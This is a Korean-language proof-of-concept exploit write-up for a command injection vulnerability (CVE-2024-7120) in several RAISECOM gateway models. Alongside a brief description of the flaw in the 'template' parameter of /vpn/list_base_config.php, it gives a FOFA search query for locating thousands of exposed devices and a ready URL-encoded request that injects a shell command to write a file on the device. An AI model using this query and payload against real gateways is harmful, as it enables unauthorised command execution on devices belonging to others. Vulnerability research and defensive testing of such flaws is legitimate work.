
RAISECOM 게이트웨이 장치의 CVE-2024-7120 명령 주입 취약점에 대한 개념 증명 익스플로잇입니다. 공격 세부 정보, 영향을 받는 모델, 보안 테스트를 위한 curl 기반 공격 예제를 제공합니다.
RAISECOM 게이트웨이 기기(모델 MSG1200, MSG2100E, MSG2200, MSG2300)에서 명령 주입 취약점이 확인되었습니다. 이 취약점으로 인해 원격 공격자가 웹 인터페이스를 통해 시스템에서 임의 명령을 실행할 수 있습니다. 문제는 list_base_config.php 스크립트, 특히 template 매개변수에 있으며, 인터넷 상의 25,112개 이상의 기기에 영향을 미칩니다.
✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

URI: /vpn/list_base_config.php
설명: list_base_config.php는 RAISECOM 게이트웨이 기기의 VPN 구성을 관리하는 데 사용되는 웹 기반 인터페이스 구성 요소입니다. 확인된 취약점은 이 스크립트에서 template 매개변수를 부적절하게 처리하기 때문에 발생합니다. 이 매개변수는 입력 검증 부족으로 인해 기기 운영 체제에서 임의 명령을 실행하는 데 악용될 수 있습니다.
CWE-77: 명령 주입
다음은 curl 명령을 사용하여 취약점을 익스플로잇하는 방법의 예입니다:
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"
이 예에서는 curl 명령이 악의적인 HTTP GET 요청을 list_base_config.php 스크립트로 전송합니다. 요청은 template 매개변수를 이용하여 명령을 실행합니다.

